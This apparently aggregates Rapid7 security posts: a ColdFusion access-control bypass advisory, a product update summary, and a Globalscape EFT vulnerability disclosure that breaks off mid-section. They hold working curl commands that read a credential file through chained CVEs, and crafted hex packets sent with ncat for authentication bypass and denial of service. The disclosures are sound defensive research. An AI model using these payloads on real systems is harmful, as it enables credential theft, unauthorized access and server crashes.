CVE-2023-29298: Adobe ColdFusion Access Control Bypass

However, if we issue the following cURL command, noting the double forward slash in the path:

c:\> curl -v -k http://172.23.10.174:8500//CFIDE/wizards/common/utils.cfc?method=wizardHash^&inPassword=foo

CVE-2023-29298: Adobe ColdFusion Access Control Bypass

We can see that the access control has been bypassed and the request completed successfully.

Similarly, if we try to access the ColdFusion Administrator interface in a web browser from an external IP that is not allowed access, the following error is displayed.

CVE-2023-29298: Adobe ColdFusion Access Control Bypass

However, if we use an extra forward slash in the URL, we can now access the ColdFusion Administrator interface.

CVE-2023-29298: Adobe ColdFusion Access Control Bypass

Chaining CVE-2023-29298 to CVE-2023-26360

The access control bypass in CVE-2023-29298 can also be leveraged to assist in the exploitation of an existing ColdFusion vulnerability. One example of this is CVE-2023-26360, which allows for both arbitrary file reading as well as remote code execution. In order to exploit CVE-2023-26360 to read an arbitrary file, an attacker must request a valid CFC endpoint on the target. As we have seen, there are multiple such endpoints available in the ColdFusion Administrator. Exploiting CVE-2023-26360 to read a file password.properties can be achieved with the following cURL command:

c:> curl -v -k http://172.26.181.162:8500/CFIDE/wizards/common/utils.cfc?method=wizardHash^&inPassword=foo^&_cfclient=true^&returnFormat=wddx -X POST -H "Content-Type: application/x-www-form-urlencoded" --data "_variables={\"about\":{\"_metadata\":{\"classname\":\"\\..\\lib\\password.properties\"},\"_variables\":{}}}"

However, if the access control is configured to block external requests to the ColdFusion Administrator, the request will fail.

CVE-2023-29298: Adobe ColdFusion Access Control Bypass

Therefore we can chain CVE-2023-29298 to CVE-2023-26360 and bypass the access control in order to reach a CFC endpoint and trigger the vulnerability via the following:

c:> curl -v -k http://172.26.181.162:8500//CFIDE/wizards/common/utils.cfc?method=wizardHash^&inPassword=foo^&_cfclient=true^&returnFormat=wddx -X POST -H "Content-Type: application/x-www-form-urlencoded" --data "_variables={\"about\":{\"_metadata\":{\"classname\":\"\\..\\lib\\password.properties\"},\"_variables\":{}}}"

CVE-2023-29298: Adobe ColdFusion Access Control Bypass

As we can see, we have now successfully exploited CVE-2023-26360 as a result of our ability to use CVE-2023-29298 as a primitive — and we can therefore read the contents of the password.properties file.

Remediation

Adobe released a fix for this vulnerability on July 11, 2023. According to Adobe, the following versions remediate the issue:

  • ColdFusion 2023 GA build
  • ColdFusion 2021 Update 7
  • ColdFusion 2018 Update 17

For more details please read the Adobe security advisory.

Note: Rapid7 reported an incomplete fix for this issue to Adobe on June 30, 2023 after testing the vendor-provided patch. We have not independently tested the latest fix.

Timeline

  • April 11, 2023: Rapid7 makes initial contact with Adobe Product Security Incident Response Team (PSIRT).
  • April 12, 2023: Rapid7 discloses the vulnerability details to Adobe PSIRT. Adobe confirms receipt and assigns internal tracking number VULN-24594.
  • April 20, 2023: Adobe requests additional details regarding the network setup used during testing. Rapid7 provides the requested details and Adobe confirms receipt of the details.
  • April 25, 2023: Rapid7 requests a status update. Adobe confirms they have reproduced the issue. Rapid7 requests a CVE identifier from Adobe.
  • May 2 – May 24, 2023: Rapid7 and Adobe discuss a coordinated disclosure date and agree to publish advisories on July 11, 2023. Adobe assigns CVE-2023-29298.
  • June 13 – June 30, 2023: Further coordination with Adobe; Adobe provides Rapid7 with the patch for the issue.
  • June 30, 2023: Rapid7 informs Adobe that the patch they’ve implemented is incomplete and can be bypassed.
  • July 6 – 7, 2023: Adobe tells Rapid7 they have implemented an improved fix and are confident that it mitigates the issue. Rapid7 is not able to allocate researchers to test the new fix in time for disclosure. Rapid7 and Adobe agree to move forward with disclosure on July 11 given Adobe’s confidence in their fix.
  • July 11, 2023: This disclosure.

What’s New in InsightVM and Nexpose: Q2 2023 in Review

Post Syndicated from Roshnee Mistry Shah original https://blog.rapid7.com/2023/06/29/whats-new-in-insightvm-and-nexpose-q2-2023-in-review/

What’s New in InsightVM and Nexpose: Q2 2023 in Review

The past few weeks have been extraordinary for the global threat landscape with zero-day vulnerabilities like MOVEit (CVE-2023-34362) and Barracuda’s Email Security Gateway (ESG) (CVE-2023-2868). Rapid7’s security research team was one of the first to detect exploitation of Progress Software’s MOVEit Transfer solution—four days before the vendor issued public advisory. From there, the team moved quickly to provide prompt remediation guidance to InsightVM and Nexpose customers.

With continued focus to drive better customer outcomes, this quarter is filled with product upgrades like improved UI for the Console, custom policy for Agent-Based assessment, an updated dashboard card, and more. Let’s take a look at some of the key updates in InsightVM and Nexpose from Q2.

[InsightVM] Agent-Based Policy supports custom policy assessment

Guidelines from Center for Internet Security (CIS) and Security Technical Implementation Guides (STIG) are widely used industry benchmarks for configuration assessment. However, a benchmark or guideline alone may not meet the unique needs of every business.

So, Agent-Based Policy assessment now supports Custom Policies. Global Administrators can now customize built-in policies, upload policies, or enable a copy of existing custom policies for agent-based assessments. Learn more here.

What’s New in InsightVM and Nexpose: Q2 2023 in Review

[InsightVM] Top Riskiest Asset Locations dashboard card provides even more details

The Top Riskiest Asset Locations dashboard card previously showed site location and risk score. This card was enhanced, on customer request, to also include total assets and total vulnerabilities in the card preview. This provides customers additional context around why a location has a large risk score and helps alert users to sites requiring additional attention.

What’s New in InsightVM and Nexpose: Q2 2023 in Review

[InsightVM and Nexpose] A new look for the Users section of the Console Administration

This quarter, we also continued updating the user interface (UI) of the Console Administration to facilitate a more intuitive and consistent user experience across the Console and the Insight Platform, including InsightVM.

The latest section to be updated is the Users section of the Console Administration. The update improves accessibility and the overall user experience of the Users page. We also made some cool new additions like light mode, a wizard to make adding new users under “Add Users” section more intuitive, and the ability to Manage columns displayed on the Users overview section.

What’s New in InsightVM and Nexpose: Q2 2023 in Review

[InsightVM and Nexpose] Support for Ubuntu 22.04 LTS

Security Console and Scan Engine now support Ubuntu 22.04 Operating System. Ubuntu is one of the most popular Linux distributions. Version 22.04 of Ubuntu will receive long term support from the vendor for hardware and maintenance updates as well as extended security maintenance. Customers on the previous versions of Ubuntu can now upgrade to 22.04!

[InsightVM and Nexpose] Containerized scan engine – continuous release

Containerized Scan Engine delivers the Scan Engine as a packaged or portable application that can easily be deployed to modern infrastructure. Now a new Containerized Engine image is automatically created and posted to Docker Hub with every InsightVM Product or Content update. This ensures you’re continuously working with the latest release. Prior versions are also available, denoted by tag. Learn more about containerized scan engines.

[InsightVM and Insight Platform] New retention setting for tracking Insight Agents

You can now configure the retention period that determines how long Insight Agents are tracked in your Agents table. In addition to the default 30 day period, this new setting allows you to set retention periods of 7 and 15 days. See our updated Agent management settings documentation for configuration instructions and more details.

[InsightVM and Nexpose] Checks for notable vulnerabilities

We have been committed to providing swift coverage for the emergent threats Rapid7 responds to under our Emergent Threat Response (ETR) program. Since Q4 2022, we provided coverage the same day or within 24 hours for over 20 emergent threats, which includes zero-day vulnerabilities.

Rapid7’s Emergent Threat Response (ETR) program flagged multiple CVEs this quarter. InsightVM and Nexpose customers can assess their exposure to many of these CVEs with vulnerability checks, including:

  • MOVEit Transfer solution CVE-2023-34362: Rapid7’s research team saw the first instances of compromise in Progress Software’s MOVEit Transfer solution. This was four days before the vendor issues public advisory. Since then our team has been tracking this critical zero-day vulnerability. Rapid7 has remote and authenticated vulnerability checks available to InsightVM and Nexpose customers for both MOVEit Transfer vulnerabilities. Learn more here.
  • Widespread Exploitation of Zyxel Network Devices CVE-2023-28771: Added to the Known Exploited Vulnerabilities (KEV) list by CISA, this vulnerability impacted the Zyxel networking devices. The vulnerability is present in the default configuration of vulnerable devices and is exploitable in the Wide Area Network (WAN) interface, which is intended to be exposed to the internet. Learn more about Rapid7’s response here.
  • PaperCut Remote Code Execution Vulnerability CVE-2023-27350: an unauthenticated remote code execution vulnerability in PaperCut MF/NG print management software that allows attackers to bypass authentication and execute arbitrary code as SYSTEM on vulnerable targets. InsightVM customers have an authenticated check available for the CVE on Windows and MacOS systems. Learn more about Rapid7’s response here.
  • Barracuda ESG Appliances CVE-2023-2868: The Email Security Gateway (ESG) appliances of Barracuda Networks were impacted by a remote command injection vulnerability that the firm said had been exploited in the wild by threat actors since at least October 2022. Learn more about the CVE and mitigation guidance here.
  • Fortinet’s Fortigate Firewall CVE-2023-27997: A critical remote code execution (RCE) vulnerability was discovered in Fortigate SSL VPN firewalls. Fortinet device vulnerabilities are historically popular with attackers of all skill levels, though exploitability varies on a vuln-by-vuln basis. An authenticated vulnerability check is available for Rapid7 customers to assess their exposure. Learn more here.

Multiple Vulnerabilities in Fortra Globalscape EFT Administration Server [FIXED]

Post Syndicated from Ron Bowes original https://blog.rapid7.com/2023/06/22/multiple-vulnerabilities-in-fortra-globalscape-eft-administration-server-fixed/

Multiple Vulnerabilities in Fortra Globalscape EFT Administration Server [FIXED]

Earlier this year, Rapid7 researchers undertook a project to analyze managed file transfer applications, due to the number of recent vulnerabilities discovered in those types of applications. We chose Fortra Globalscape EFT as a target since it’s reasonably popular and seemed complex enough to have some bugs (plus, it’s owned by the same company as GoAnywhere, which was exploited by the Cl0p ransomware gang earlier this year). Today, we are disclosing four issues that we uncovered in the Globalscape administration server, the worst of which can lead to remote code execution as the SYSTEM user if successfully exploited (which is difficult, as we’ll see below).

The issues we reported affect Fortra Globalscape 8.0.x up to 8.1.0.14, and all but one are fixed in 8.1.0.16 (the outstanding issue is currently unfixed, but minor):

  • CVE-2023-2989 – Authentication bypass via out-of-bounds memory read (vendor advisory)
  • CVE-2023-2990 – Denial of service due to recursive DeflateStream (vendor advisory)
  • CVE-2023-2991 – Remote hard drive serial number disclosure (vendor advisory) (not currently fixed)
  • Additional issue – Password leak due to insecure default configuration (vendor advisory)

We performed these tests on Globalscape version 8.1.0.11 on Windows Server 2022, but the impact should be the same on any Windows version.

Credit

This issue was discovered by Ron Bowes of Rapid7. We are disclosing it in accordance with Rapid7’s vulnerability disclosure policy.

Impact

The theoretical impact of the worst vulnerability—CVE-2023-2989—is remote code execution as the SYSTEM user. However, exploitation relies on a tricky confluence of circumstances and an unlikely guess, which means that the odds of exploitation in the wild are low (unless somebody finds a way to develop a more reliable exploit).

Technical Details

Our research project focused on the Globalscape administration server, which runs on TCP port 1100 by default. Port 1100 is the interface used by privileged users when they connect to the service using the remote administration client, as well as the interface used by administrators to make site-wide changes (which means it shouldn’t be connected to the public internet). A valid administration session can execute Windows commands on the server in the context of the service user, which is SYSTEM by default. This means that bypassing the authentication on the server leads directly to remote code execution.

We will begin by detailing the network protocol. Then, with knowledge of how the protocol works, we’ll look at each issue.

A partial implementation of the protocol, as well as proofs of concept for each of these issues, are available in a Github project called Gestalt. We’ll link to the individual proof of concept in each session.

Globalscape Admin Protocol

To make any sense of the remainder of this disclosure, we need to learn a bit about the Globalscape admin protocol that Globalscape EFT uses. Since we don’t have source code, we’ve reverse engineered how the protocol works and identified names and fields as best as we could. The original protocol implementation is in the service executable, cftpstes.exe, and ours is in libgestalt.rb.

Globalscape EFT’s administrator service is a binary-based protocol that runs on TCP port 1100 by default. Each message has a short (8-byte) header followed by zero or more parameters in an optional body.

The header is always comprised of exactly two 32-bit little-endian fields:

  • (32-bit) Packet length – used as part of the TCP protocol to read a full message off the wire, and also tells the parser when to stop reading packet data
  • (32-bit) Message ID – used to multiplex different message types (without authenticating, permitted messages are 0x01 (login), and 0x138-0x13a (licensing stuff))

If the message length is longer than 8 bytes, the message also has a body, which is composed of one or more parameters. Parameters in the body are formatted as a pretty typical type-length-value (TLV) structure, with human-readable field names to distinguish which field is which. The structure of the body is:

  • (32-bit) User-readable field name (such as PSWD for password and ADLN for username)
  • (32-bit) Type (the type is almost always 5, which is length-prefixed free-form data, but other types exist as well)
  • (Variable) Value; if the packet type is 5, it’s a length-prefixed free-form data structure:
    • (32-bit) Parameter length
    • (Variable) Value — the value is structured differently depending on the field name

The other noteworthy type is 1, in which case the parameter value is a 32-bit integer.

For example, here’s a login message:

          |       header        |  body.......     
00000000  5e 00 00 00 01 00 00 00  50 53 57 44 05 00 00 00   ^....... PSWD....
00000010  24 00 00 00 20 00 00 00  86 40 71 de d2 ea 9e 12   $... ... .@q.....
00000020  d5 ae 18 40 64 c4 04 ed  c1 08 78 b3 9e c6 4a 57   ...@d... ..x...JW
00000030  c6 1d b6 8d 49 24 0b 8b  41 44 4c 4e 05 00 00 00   ....I$.. ADLN....
00000040  0a 00 00 00 fc ff ff ff  72 00 6f 00 6e 00 41 4d   ........ r.o.n.AM
00000050  49 44 05 00 00 00 04 00  00 00 00 00 00 00         ID...... ......

We can break down that message into the header and body, then named parameters within the body:

  • Header (8 bytes):
    • Length: 0x0000005e (94 bytes)
    • Message id: 0x00000001 (login)
  • Body (86 bytes):
    • Field 1:PSWD (encrypted password)
      • 0x00000005 – type
      • 0x00000024 – length (0x24 bytes)
      • \x20\x00\x00\x00\x86\x40... – value (encrypted password w/ length prefix)
    • Field 2: ADLN (username)
      • 0x00000005 – type
      • 0x0000000a – length (0x0a bytes)
      • \xfc\xff\xff\xff\x72\x00\x6f\x00\x6e\x00 – value ("ron" w/ inverted length prefix (which appears to indicate UTF-16 encoding))
    • Field 3: AMID – login type
      • 0x00000005 – type
      • 0x00000004 – length (4 bytes)
      • 0x00000000 – value (0 = EFT authentication)

All messages follow this structure, although each message ID has a different set of required parameters. The named parameters don’t need to be in any particular order.

Compression

A special message ID, 0xff7f, indicates that the body of the message is a full message (header and all), compressed as a Zlib deflate stream. A compressed version of the same login message from above might look like this:

00000000  5f 00 00 00 7f ff 00 00  78 9c 8b 63 60 60 60 04   _....... x..c```.
00000010  e2 80 e0 70 17 56 20 ad  02 c4 0a 40 dc e6 50 78   ...p.V . [email protected]
00000020  ef d2 ab 79 42 57 d7 49  38 a4 1c 61 79 7b 90 a3   ...yBW.I 8..ay{..
00000030  62 f3 bc 63 5e e1 c7 64  b7 f5 7a aa 70 77 3b ba   b..c^..d ..z.pw;.
00000040  f8 f8 81 d4 73 01 f1 9f  ff ff ff 17 31 e4 33 e4   ....s... ....1.3.
00000050  31 38 fa 7a 82 4d 61 61  80 00 00 bd 2a 19 18      18.z.Maa ....*..

This compressed message has a length of 0x0000005f, message ID of 0x0000ff7f, and a body of \x78\x9c\x8b..... The \x78 at the start indicates that it’s likely a deflate stream (and it is). If we use the openssl command-line utility to un-deflate the data, we get back the original message:

$ echo -ne "\x78\x9c\x8b\x63\x60\x60\x60\x04\xe2\x80\xe0\x70\x17\x56\x20\xad\x02\xc4\x0a\x40\xdc\xe6\x50\x78\xef\xd2\xab\x79\x42\x57\xd7\x49\x38\xa4\x1c\x61\x79\x7b\x90\xa3\x62\xf3\xbc\x63\x5e\xe1\xc7\x64\xb7\xf5\x7a\xaa\x70\x77\x3b\xba\xf8\xf8\x81\xd4\x73\x01\xf1\x9f\xff\xff\xff\x17\x31\xe4\x33\xe4\x31\x38\xfa\x7a\x82\x4d\x61\x61\x80\x00\x00\xbd\x2a\x19\x18" | openssl zlib -d | hexdump -C
00000000  5e 00 00 00 01 00 00 00  50 53 57 44 05 00 00 00  |^.......PSWD....|
00000010  24 00 00 00 20 00 00 00  86 40 71 de d2 ea 9e 12  |$... ....@q.....|
00000020  d5 ae 18 40 64 c4 04 ed  c1 08 78 b3 9e c6 4a 57  |[email protected]|
00000030  c6 1d b6 8d 49 24 0b 8b  41 44 4c 4e 05 00 00 00  |....I$..ADLN....|
00000040  0a 00 00 00 fc ff ff ff  72 00 6f 00 6e 00 41 4d  |........r.o.n.AM|
00000050  49 44 05 00 00 00 04 00  00 00 00 00 00 00        |ID............|

The remainder of this section will demonstrate issues we discovered in this admin protocol.

CVE-2023-2989—Authentication Bypass via Out-of-Bounds Read

We discovered a (blind) out-of-bounds memory read in the Globalscape EFT admin server that allows a specially crafted message to parse data anywhere in memory as if it’s part of the message itself. Although it’s tricky to exploit, an attacker can potentially leverage this issue to authenticate as another user that recently logged in by jumping into their login message and letting the parser believe it’s the attacker’s login message. We found this by developing a fairly naive fuzzer, which mostly just flips random bits in packets, that you can find here, then determining why the process crashed a bunch of different (but similar) ways. The vendor has published an advisory for this issue here.

Successful exploitation requires a confluence of factors; namely, the attacker must log in shortly after an administrator, while the administrator’s login message is still on the heap, then successfully guess the offset between their malicious message and the administrator’s login message. We did some experimentation and narrowed down the heap layout well enough to succeed after just a handful of attempts under ideal conditions. You can see how that works in our proof of concept, which logs in as the administrator then immediately sends an exploit attempt. This usually works after a small number of attempts in our lab environment (5-10 tries on average).

In the protocol documentation above, we noted that the 32-bit length field at the start of the message is used as part of the TCP protocol to receive exactly one TCP message. That means that if the length field is too large or too small, the TCP recv() operation will receive the requested number of bytes (if it can) and, if the message is incomplete or too long, it will simply not be processed. That typically prevents the packet parser from parsing a message with an invalid length.

However, we found a second way to create a message that gets parsed by the same protocol parser but does not go through TCP: compressed messages! When a message is compressed, the TCP stack is no longer involved, and the prefixed length is not validated in any way. The message parser will attempt to parse the message until it reaches the end, as indicated by the message length field, no matter how much data there actually is; that could be well past the end of available memory.

We can demonstrate this by creating a message with a very very long length (0x7fffffff), with a parameter that claims to be 0x41414141 bytes long (lots of other variations also work fine):

00000000  ff ff ff 7f 01 00 00 00  50 53 57 44 05 00 00 00   ........ PSWD....
00000010  41 41 41 41                                        AAAA

If we send that directly, it will be rejected after the server fails to receive 0x7fffffff bytes. However, if we compress the message, we end up with this 0x21-byte compressed version:

00000000  21 00 00 00 7f ff 00 00  78 9c fb ff ff 7f 3d 23   !....... x.....=#
00000010  03 03 43 40 70 b8 0b 2b  90 76 04 02 00 51 27 05   ..C@p..+ .v...Q'.
00000020  c5                                                 .

Which we can send with ncat or similar tools:

$ echo '\x21\x00\x00\x00\x7f\xff\x00\x00\x78\x9c\xfb\xff\xff\x7f\x3d\x23\x03\x03\x43\x40\x70\xb8\x0b\x2b\x90\x76\x04\x02\x00\x51\x27\x05\xc5' | ncat 172.16.166.170 1100

The TCP stack easily receives the 0x21 (33) bytes into a buffer. Then it inflates that message into 0x14 bytes of uncompressed data, including the enormous (and unvalidated) length field, which it assumes is correct. Unsurprisingly, that doesn’t go well! Since this is a heap overflow on a randomized heap, this proof of concept isn’t completely deterministic, but after a few tries the server should crash with an out-of-bounds read of some sort. This particular crash can happen in a variety of places depending on when exactly it reaches the end of available memory (plus, it depends what other values exist in the memory it’s trying to parse), which made it tricky to triage fuzzer crashes, but here’s one such crash:

(1bbc.87c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\Program Files\Globalscape\EFT Server\cftpstes.exe
VCRUNTIME140!memcpy+0x627:
00007ff8`0ddc1917 0f10441110      movups  xmm0,xmmword ptr [rcx+rdx+10h] ds:0000024b`a61d0ff4=????????????????????????????????

From the registers, we can see that rdx, which is used in the memory read, is set to a negative value:

0:089> r
rax=0000024be75e5191 rbx=0000024ba61d1060 rcx=0000024ba74a9d10
rdx=fffffffffed272d4 rsi=0000000041414141 rdi=0000004d8611f418
rip=00007ff80ddc1917 rsp=0000004d8611f368 rbp=0000024ba4ef8334
 r8=0000000041414130  r9=0000000000025b19 r10=0000024ba4ef8334
r11=0000024ba61d1060 r12=0000024ba4ef8320 r13=0000004d8611f748
r14=0000000000000000 r15=0000000044575350
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
VCRUNTIME140!memcpy+0x627:
00007ff8`0ddc1917 0f10441110      movups  xmm0,xmmword ptr [rcx+rdx+10h] ds:0000024b`a61d0ff4=????????????????????????????????

Here’s the call stack leading up to the memcpy() where it crashes:

0:089> k
 # Child-SP          RetAddr               Call Site
00 0000004d`8611f368 00007ff6`d3e1405b     VCRUNTIME140!memcpy+0x627 [D:\a\_work\1\s\src\vctools\crt\vcruntime\src\string\amd64\memcpy.asm @ 735] 
01 0000004d`8611f370 00007ff6`d4011c2b     cftpstes!OPENSSL_Applink+0xde5cb
02 0000004d`8611f3b0 00007ff6`d4011640     cftpstes!OPENSSL_Applink+0x2dc19b
03 0000004d`8611f570 00007ff6`d401169f     cftpstes!OPENSSL_Applink+0x2dbbb0
04 0000004d`8611f640 00007ff6`d40ea977     cftpstes!OPENSSL_Applink+0x2dbc0f
05 0000004d`8611f710 00007ff6`d404430d     cftpstes!OPENSSL_Applink+0x3b4ee7
06 0000004d`8611fa20 00007ff6`d3f84989     cftpstes!OPENSSL_Applink+0x30e87d
07 0000004d`8611fb10 00007ff6`d3dbf8f2     cftpstes!OPENSSL_Applink+0x24eef9
08 0000004d`8611fbe0 00007ff6`d3e2d87b     cftpstes!OPENSSL_Applink+0x89e62
09 0000004d`8611fd10 00007ff8`1ac06b4c     cftpstes!OPENSSL_Applink+0xf7deb
0a 0000004d`8611fd50 00007ff8`1bdb4dd0     ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x4c
0b 0000004d`8611fd80 00007ff8`1d69e3db     KERNEL32!BaseThreadInitThunk+0x10
0c 0000004d`8611fdb0 00000000`00000000     ntdll!RtlUserThreadStart+0x2b

Initially, we categorized this as a denial of service and moved on. Later, we realized that it could actually be leveraged for more. If we could construct a login message that, when parsed, jumps perfectly into another login message, that’s an opportunity to use a different user’s credentials without ever knowing them.

To develop an exploit that does exactly that, we connected to the service several thousand times, and used a debugger to determine where memory is allocated each time. Because of ASLR (randomized memory addresses), the heap memory allocations move around slightly, but we did narrow down the range quite a bit. Specifically, in our experimentation, our login messages were allocated at memory addresses that are some multiple of 0x70 bytes apart, and usually quite close together. Experimentally, the most common distance between two consecutive messages on Windows Server 2022 was 0x380 bytes, but several other offsets are also common. We developed this message as a demonstration, which assumes the next message starts 0x4d0 bytes after our message, which was the first working offset we discovered:

00000000  2e 05 00 00 01 00 00 00  61 61 61 61 05 00 00 00   ........ aaaa....
00000010  c4 04 00 00 00 00 00 00  61 61 61 61 61 61 61 61   ........ aaaaaaaa
00000020  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61   aaaaaaaa aaaaaaaa
00000030  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61   aaaaaaaa aaaaaaaa
00000040  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61   aaaaaaaa aaaaaaaa
00000050  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61   aaaaaaaa aaaaaaaa
00000060  61 61 61 61 61 61 61 61                            aaaaaaaa 

Which compresses into the following:

00000000  25 00 00 00 7f ff 00 00  78 9c d3 63 65 60 60 64   %....... x..ce``d
00000010  60 60 48 04 02 20 93 e1  08 0b 03 18 24 52 19 00   ``H.. .. ....$R..
00000020  00 b7 34 20 d6                                     ..4 .

The message claims to be 0x52e bytes long, which means that, as far as the parser is concerned, our message will end at the end of the next login message in memory!

This malicious login message contains one parameter that claims to be 0x4c4 bytes long with an unused name (aaaa). When that parameter is parsed, the parser will read (and discard) the entire 0x4c4-byte field, because a field called aaaa isn’t something it cares about. But, because the length of the field is 0x4c4 bytes, which doesn’t exceed the packet length of 0x52e bytes, the parser will check for the next field 0x4d0 bytes later, which is where the body of the next message starts. So, the parser will happily continue parsing the body of the second message as if it’s still part of the same message until it does reach the maximum length of 0x52e, which should be exactly where that message ends. That means that the various authentication fields (username/password) will come from that message!

Here’s what the messages look like when this attack succeeds:

In (version details):

    00000000  2c 00 00 00 2b 00 00 00  56 52 53 4e 01 00 00 00   ,...+... VRSN....
    00000010  a0 01 00 80 50 54 59 50  01 00 00 00 00 00 00 00   ....PTYP ........
    00000020  4c 53 59 53 01 00 00 00  01 00 00 00               LSYS.... ....

Out (malicious compressed packet):

00000000  25 00 00 00 7f ff 00 00  78 9c d3 63 65 60 60 64   %....... x..ce``d
00000010  60 60 48 04 02 20 93 e1  08 0b 03 18 24 52 19 00   ``H.. .. ....$R..
00000020  00 b7 34 20 d6                                     ..4 .

In (login succeeded):

    0000002C  96 18 00 00 01 00 00 00  41 44 4d 4e 05 00 00 00   ........ ADMN....
    0000003C  66 00 00 00 fc ff ff ff  72 00 6f 00 6e 00 00 00   f....... r.o.n...
    0000004C  00 00 f4 98 aa 1a d0 15  54 fe af 1b 98 81 12 a9   ........ T.......
    0000005C  4f 45 00 00 00 00 01 00  00 00 00 00 00 00 00 00   OE...... ........
    [...]

This succeeds at a rate of approximately 1 in 10, even under ideal conditions; however, a clever attacker may be able to improve that by massaging the heap a bit. Therefore, we believe that this is a high-risk vulnerability, and should be treated as such.

CVE-2023-2990—Denial of Service Due to Recursive Compression

The Globalscape EFT server can be crashed by sending a recursively compressed packet (a compression "quine" to the administration port. We published a proof of concept here. The vendor has published advisory here.

We found the following function in the Globalscape EFT server, which we called decompress_and_parse_packet, that checks for the special compression message ID mentioned above (0xff7f):

.text:00007FF6D4011610                         decompress_and_parse_packet(void *parsed, void *packet, int length) proc near   ; CODE XREF: sub_7FF6D3E0D9F0+BAC↑p
.text:00007FF6D4011610                                                                 ; decompress_and_parse_packet+8A↓p ...
.text:00007FF6D4011610
; [......]
.text:00007FF6D4011632
.text:00007FF6D4011632                         check_for_compression:                  ; CODE XREF: decompress_and_parse_packet+19↑j
.text:00007FF6D4011632 81 7A 04 7F FF 00 00                    cmp     dword ptr [rdx+4], 0FF7Fh ; <-- Compare the msgid to 0xff7f
.text:00007FF6D4011639 74 07                                   jz      short packet_is_compressed ; <-- Handle compressed messages
.text:00007FF6D401163B E8 90 00 00 00                          call    parse_packet
.text:00007FF6D4011640 EB 6B                                   jmp     short return
.text:00007FF6D4011642                         ; ---------------------------------------------------------------------------
; [...]
.text:00007FF6D4011642                         packet_is_compressed:                   ; CODE XREF: decompress_and_parse_packet+29↑j
.text:00007FF6D4011642 8B 1A                                   mov     ebx, [rdx]
; [... decompression stuff ...]
.text:00007FF6D401168F 4C 8B C0                                mov     r8, rax
.text:00007FF6D4011692 48 8B 54 24 28                          mov     rdx, [rsp+0C8h+var_A0]
.text:00007FF6D4011697 48 8B CE                                mov     rcx, rsi
.text:00007FF6D401169A E8 71 FF FF FF                          call    decompress_and_parse_packet ; <-- Recurse after decompressing
.text:00007FF6D401169F 8B D8                                   mov     ebx, eax

Because the function recurses after decompressing, a message that decompresses to itself with an appropriate header will recurse infinitely and quickly crash the Globalscape EFT server.

To develop an exploit, we found this post about how to generate a compression quine with an arbitrary header, which includes ancient Go source code to generate an arbitrary quine in several different formats (.zip, .tar.gz, and .gz). We updated the Go code to compile on modern versions of Go, and to output a raw deflate stream. Using our version of that tool, we developed the following "quine" packet, which is also available in our proof of concept repository:

00000000  e2 00 00 00 7f ff 00 00  78 9c 7a c4 c0 c0 50 ff  |........x.z...P.|
00000010  9f 81 a1 62 0e 00 10 00  ef ff 7a c4 c0 c0 50 ff  |...b......z...P.|
00000020  9f 81 a1 62 0e 00 10 00  ef ff 82 f1 61 7c 00 00  |...b........a|..|
00000030  05 00 fa ff 82 f1 61 7c  00 00 05 00 fa ff 00 05  |......a|........|
00000040  00 fa ff 00 14 00 eb ff  82 f1 61 7c 00 00 05 00  |..........a|....|
00000050  fa ff 00 05 00 fa ff 00  14 00 eb ff 42 88 21 c4  |............B.!.|
00000060  00 00 14 00 eb ff 42 88  21 c4 00 00 14 00 eb ff  |......B.!.......|
00000070  42 88 21 c4 00 00 14 00  eb ff 42 88 21 c4 00 00  |B.!.......B.!...|
00000080  14 00 eb ff 42 88 21 c4  00 00 00 00 ff ff 00 00  |....B.!.........|
00000090  00 ff ff 00 17 00 e8 ff  42 88 21 c4 00 00 00 00  |........B.!.....|
000000a0  ff ff 00 00 00 ff ff 00  17 00 e8 ff 42 12 46 16  |............B.F.|
000000b0  06 00 00 00 ff ff 01 08  00 f7 ff aa bb cc dd 00  |................|
000000c0  00 00 00 42 12 46 16 06  00 00 00 ff ff 01 08 00  |...B.F..........|
000000d0  f7 ff aa bb cc dd 00 00  00 00 aa bb cc dd 00 00  |................|
000000e0  00 00                                             |..|

We can demonstrate that the body decompresses to itself by using the openssl zlib inflation command on the 213-byte message body:

$ dd if=recursive.zlib bs=1 skip=8 count=213 2>/dev/null | openssl zlib -d | hexdump -C
00000000  e2 00 00 00 7f ff 00 00  78 9c 7a c4 c0 c0 50 ff  |........x.z...P.|
00000010  9f 81 a1 62 0e 00 10 00  ef ff 7a c4 c0 c0 50 ff  |...b......z...P.|
00000020  9f 81 a1 62 0e 00 10 00  ef ff 82 f1 61 7c 00 00  |...b........a|..|
00000030  05 00 fa ff 82 f1 61 7c  00 00 05 00 fa ff 00 05  |......a|........|
00000040  00 fa ff 00 14 00 eb ff  82 f1 61 7c 00 00 05 00  |..........a|....|
00000050  fa ff 00 05 00 fa ff 00  14 00 eb ff 42 88 21 c4  |............B.!.|
00000060  00 00 14 00 eb ff 42 88  21 c4 00 00 14 00 eb ff  |......B.!.......|
00000070  42 88 21 c4 00 00 14 00  eb ff 42 88 21 c4 00 00  |B.!.......B.!...|
00000080  14 00 eb ff 42 88 21 c4  00 00 00 00 ff ff 00 00  |....B.!.........|
00000090  00 ff ff 00 17 00 e8 ff  42 88 21 c4 00 00 00 00  |........B.!.....|
000000a0  ff ff 00 00 00 ff ff 00  17 00 e8 ff 42 12 46 16  |............B.F.|
000000b0  06 00 00 00 ff ff 01 08  00 f7 ff aa bb cc dd 00  |................|
000000c0  00 00 00 42 12 46 16 06  00 00 00 ff ff 01 08 00  |...B.F..........|
000000d0  f7 ff aa bb cc dd 00 00  00 00 aa bb cc dd 00 00  |................|
000000e0  00 00                                             |..|

We can send that message to the Globalscape EFT admin port using Netcat:

$ nc -v 172.16.166.170 1100 < recursive.zlib
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Connected to 172.16.166.170:1100.

And observe the server crash due to stack exhaustion (in a debugger):

0:073> g
(12dc.1a68): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
ntdll!RtlpHpAllocVirtBlockCommitFirst+0x31:
00007ff8`1d67f0dd e822220000      call    ntdll!RtlpGetHeapProtection (00007ff8`1d681304)

